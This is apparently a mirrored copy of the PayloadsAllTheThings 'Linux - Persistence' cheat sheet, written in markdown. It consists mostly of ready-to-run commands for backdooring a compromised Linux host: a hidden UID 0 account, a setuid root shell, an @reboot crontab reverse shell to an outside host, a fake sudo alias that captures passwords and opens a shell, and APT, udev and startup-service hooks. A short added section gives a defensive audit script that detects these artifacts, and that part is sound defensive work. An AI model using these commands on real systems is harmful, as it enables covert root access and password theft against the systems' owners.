mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2025-01-11 22:15:26 +00:00
78ff651643
Linux evasion techniques were previously included as part of persistence, but the number of techniques is varied enough that it likely should be its own article.
172 lines
6.1 KiB
Markdown
# Linux - Persistence

## Summary

* [Basic reverse shell](#basic-reverse-shell)
* [Add a root user](#add-a-root-user)
* [Suid Binary](#suid-binary)
* [Crontab - Reverse shell](#crontab---reverse-shell)
* [Backdooring a user's bash_rc](#backdooring-a-users-bash_rc)
* [Backdooring a startup service](#backdooring-a-startup-service)
* [Backdooring a user startup file](#backdooring-a-user-startup-file)
* [Backdooring a driver](#backdooring-a-driver)
* [Backdooring the APT](#backdooring-the-apt)
* [Backdooring the SSH](#backdooring-the-ssh)
* [Additional Persistence Options](#additional-persistence-options)
* [References](#references)

## Basic reverse shell

```bash
ncat --udp -lvp 4242
ncat --sctp -lvp 4242
ncat --tcp -lvp 4242
```

## Add a root user

```bash
# -o allows a duplicate UID, so "john" gets UID 0 alongside root
sudo useradd -ou 0 -g 0 john
sudo passwd john
# --stdin exists only in the Red Hat passwd build; use the interactive passwd elsewhere
echo "linuxpassword" | passwd --stdin john
```

## Suid Binary

```bash
TMPDIR2="/var/tmp"
# the source needs _GNU_SOURCE for setresuid() plus <unistd.h> and <stdlib.h> to compile cleanly
printf '%s\n' '#define _GNU_SOURCE' '#include <unistd.h>' '#include <stdlib.h>' \
  'int main(void){setresuid(0, 0, 0);system("/bin/sh");}' > $TMPDIR2/croissant.c
gcc $TMPDIR2/croissant.c -o $TMPDIR2/croissant 2>/dev/null
rm $TMPDIR2/croissant.c
chown root:root $TMPDIR2/croissant
chmod 4777 $TMPDIR2/croissant
```

## Crontab - Reverse shell

```bash
(crontab -l ; echo "@reboot sleep 200 && ncat 192.168.1.2 4242 -e /bin/bash")|crontab 2> /dev/null
```

## Backdooring a user's bash_rc

(FR/EN version: the fake prompt text is chosen from the user's locale)

```bash
TMPNAME2=".systemd-private-b21245afee3b3274d4b2e2-systemd-timesyncd.service-IgCBE0"
cat << EOF > /tmp/$TMPNAME2
alias sudo='locale=$(locale | grep LANG | cut -d= -f2 | cut -d_ -f1);if [ \$locale = "en" ]; then echo -n "[sudo] password for \$USER: ";fi;if [ \$locale = "fr" ]; then echo -n "[sudo] Mot de passe de \$USER: ";fi;read -s pwd;echo; unalias sudo; echo "\$pwd" | /usr/bin/sudo -S nohup nc -lvp 1234 -e /bin/bash > /dev/null && /usr/bin/sudo -S '
EOF
if [ -f ~/.bashrc ]; then
    cat /tmp/$TMPNAME2 >> ~/.bashrc
fi
if [ -f ~/.zshrc ]; then
    cat /tmp/$TMPNAME2 >> ~/.zshrc
fi
rm /tmp/$TMPNAME2
```

or add the following line to the user's `.bashrc` file

```bash
$ chmod u+x ~/.hidden/fakesudo
$ echo "alias sudo=~/.hidden/fakesudo" >> ~/.bashrc
```

and create the `fakesudo` script.

```bash
#!/bin/bash
read -sp "[sudo] password for $USER: " sudopass
echo ""
sleep 2
echo "Sorry, try again."
echo "$sudopass" >> /tmp/pass.txt

/usr/bin/sudo "$@"
```

## Backdooring a startup service

```bash
# LMTHD, LHOST and LPORT are placeholders (protocol flag, listener host and port); set them first
RSHELL="ncat $LMTHD $LHOST $LPORT -e \"/bin/bash -c id;/bin/bash\" 2>/dev/null"
# insert the expanded command as line 4 of the if-up hook (an escaped \$RSHELL would only insert the literal variable name)
sed -i -e "4i $RSHELL" /etc/network/if-up.d/upstart
```

## Backdooring a user startup file

Linux: write a file in `~/.config/autostart/NAME_OF_FILE.desktop`. `Exec=` is the command the desktop session launches at login; note that `X-GNOME-Autostart-enabled=false` marks an entry as disabled and `AutostartCondition=unless-exists` skips it once the named file exists, so the entry below does not run as shown.

In: `~/.config/autostart/*.desktop`

```ini
[Desktop Entry]
Type=Application
Name=Welcome
Exec=/var/lib/gnome-welcome-tour
AutostartCondition=unless-exists ~/.cache/gnome-getting-started-docs/seen-getting-started-guide
OnlyShowIn=GNOME;
X-GNOME-Autostart-enabled=false
```

## Backdooring a driver

```bash
# RSHELL is the reverse-shell command string defined in the startup-service section above
echo "ACTION==\"add\",ENV{DEVTYPE}==\"usb_device\",SUBSYSTEM==\"usb\",RUN+=\"$RSHELL\"" | tee /etc/udev/rules.d/71-vbox-kernel-drivers.rules > /dev/null
```

The rule fires each time a USB device is added. udev unconditionally kills whatever a `RUN+=` program leaves running once the event has been handled, so this triggers the command but is not a reliable place to keep a long-running listener.

## Backdooring the APT

If you can create a file in the `apt.conf.d` directory containing `APT::Update::Pre-Invoke {"CMD"};`, CMD will be executed the next time `apt-get update` runs.

```bash
echo 'APT::Update::Pre-Invoke {"nohup ncat -lvp 1234 -e /bin/bash 2> /dev/null &"};' > /etc/apt/apt.conf.d/42backdoor
```

## Backdooring the SSH

Add an ssh key into the `~/.ssh` folder.

1. `ssh-keygen`
2. write the content of `~/.ssh/id_rsa.pub` into `~/.ssh/authorized_keys`
3. set the right permissions: 700 for `~/.ssh` and 600 for `authorized_keys`
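
As an added example (my code, not from the page or the PayloadsAllTheThings project), a read-only bash audit for the artifacts the techniques above leave behind: an extra UID 0 account, a setuid file in a temp directory, a `sudo` alias in a shell rc file, an `@reboot` crontab, an `apt.conf.d` Pre-Invoke hook, a `RUN+=` udev rule, a per-user autostart entry and the current `authorized_keys` contents. `ROOT`, `flag` and the `check_*` names are this example's own; set `ROOT` to a mounted image to run it offline.

```shell
#!/usr/bin/env bash
# Hypothetical read-only audit (added here, not from the page) for the artifacts the
# techniques above leave behind. ROOT points the checks at a mounted disk image or a
# test tree instead of the live "/"; every check prints one "finding:" line per hit.
set -u
ROOT="${ROOT:-/}"
flag() { sed "s|^|finding: $1: |"; }   # label each hit; a pipeline ending here exits 0

# "Add a root user": any account other than root whose UID is 0.
check_uid0_accounts() {
  awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$ROOT/etc/passwd" 2>/dev/null | flag "extra UID 0 account"
}
# "Suid Binary": setuid executables sitting in world-writable temp directories.
check_tmp_suid() {
  find "$ROOT/tmp" "$ROOT/var/tmp" "$ROOT/dev/shm" -xdev -type f -perm -4000 2>/dev/null | flag "setuid file in temp dir"
}
# "Backdooring a user's bash_rc": sudo redefined as an alias or function in shell rc files.
check_rc_sudo_alias() {
  grep -HnE '^[[:space:]]*(alias[[:space:]]+sudo=|(function[[:space:]]+)?sudo[[:space:]]*\(\))' \
    "$ROOT"/root/.bashrc "$ROOT"/root/.zshrc "$ROOT"/home/*/.bashrc "$ROOT"/home/*/.zshrc 2>/dev/null | flag "sudo override"
}
# "Crontab - Reverse shell": @reboot jobs in any user crontab.
check_cron_reboot() {
  grep -Hn '^@reboot' "$ROOT"/var/spool/cron/crontabs/* "$ROOT"/var/spool/cron/* 2>/dev/null | flag "@reboot cron job"
}
# "Backdooring the APT": Pre-Invoke hooks dropped into apt.conf.d.
check_apt_hooks() {
  grep -Hn 'APT::Update::Pre-Invoke' "$ROOT"/etc/apt/apt.conf.d/* 2>/dev/null | flag "apt Pre-Invoke hook"
}
# "Backdooring a driver": local udev rules that spawn a program on a device event.
check_udev_run() {
  grep -HnE 'RUN\+?=' "$ROOT"/etc/udev/rules.d/*.rules 2>/dev/null | flag "udev RUN rule"
}
# "Backdooring a user startup file": Exec= lines in per-user autostart entries.
check_autostart_exec() {
  grep -Hn '^Exec=' "$ROOT"/root/.config/autostart/*.desktop "$ROOT"/home/*/.config/autostart/*.desktop 2>/dev/null | flag "autostart entry"
}
# "Backdooring the SSH": every authorized key, so new ones can be diffed against a baseline.
check_authorized_keys() {
  grep -HnE '^(ssh-|ecdsa-|sk-)' "$ROOT"/root/.ssh/authorized_keys "$ROOT"/home/*/.ssh/authorized_keys 2>/dev/null | cut -c1-100 | flag "authorized key"
}
run_all() {
  check_uid0_accounts; check_tmp_suid; check_rc_sudo_alias; check_cron_reboot
  check_apt_hooks; check_udev_run; check_autostart_exec; check_authorized_keys; return 0
}
run_all
```

Run it on a schedule and diff the output against a baseline taken when the host was built: an autostart `Exec=` or an authorized key is only suspicious when it was not there before.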
## Additional Persistence Options

* [SSH Authorized Keys](https://attack.mitre.org/techniques/T1098/004)
* [Compromise Client Software Binary](https://attack.mitre.org/techniques/T1554)
* [Create Account](https://attack.mitre.org/techniques/T1136/)
* [Create Account: Local Account](https://attack.mitre.org/techniques/T1136/001/)
* [Create or Modify System Process](https://attack.mitre.org/techniques/T1543/)
* [Create or Modify System Process: Systemd Service](https://attack.mitre.org/techniques/T1543/002/)
* [Event Triggered Execution: Trap](https://attack.mitre.org/techniques/T1546/005/)
* [Event Triggered Execution](https://attack.mitre.org/techniques/T1546/)
* [Event Triggered Execution: .bash_profile and .bashrc](https://attack.mitre.org/techniques/T1546/004/)
* [External Remote Services](https://attack.mitre.org/techniques/T1133/)
* [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574/)
* [Hijack Execution Flow: LD_PRELOAD](https://attack.mitre.org/techniques/T1574/006/)
* [Pre-OS Boot](https://attack.mitre.org/techniques/T1542/)
* [Pre-OS Boot: Bootkit](https://attack.mitre.org/techniques/T1542/003/)
* [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053/)
* [Scheduled Task/Job: At (Linux)](https://attack.mitre.org/techniques/T1053/001/)
* [Scheduled Task/Job: Cron](https://attack.mitre.org/techniques/T1053/003/)
* [Server Software Component](https://attack.mitre.org/techniques/T1505/)
* [Server Software Component: SQL Stored Procedures](https://attack.mitre.org/techniques/T1505/001/)
* [Server Software Component: Transport Agent](https://attack.mitre.org/techniques/T1505/002/)
* [Server Software Component: Web Shell](https://attack.mitre.org/techniques/T1505/003/)
* [Traffic Signaling](https://attack.mitre.org/techniques/T1205/)
* [Traffic Signaling: Port Knocking](https://attack.mitre.org/techniques/T1205/001/)
* [Valid Accounts: Default Accounts](https://attack.mitre.org/techniques/T1078/001/)
* [Valid Accounts: Domain Accounts](https://attack.mitre.org/techniques/T1078/002/)

## References

* [@RandoriSec - https://twitter.com/RandoriSec/status/1036622487990284289](https://twitter.com/RandoriSec/status/1036622487990284289)
* [https://blogs.gnome.org/muelli/2009/06/g0t-r00t-pwning-a-machine/](https://blogs.gnome.org/muelli/2009/06/g0t-r00t-pwning-a-machine/)
* [http://turbochaos.blogspot.com/2013/09/linux-rootkits-101-1-of-3.html](http://turbochaos.blogspot.com/2013/09/linux-rootkits-101-1-of-3.html)
* [http://www.jakoblell.com/blog/2014/05/07/hacking-contest-rootkit/](http://www.jakoblell.com/blog/2014/05/07/hacking-contest-rootkit/)
* Pouki from JDI (no source code)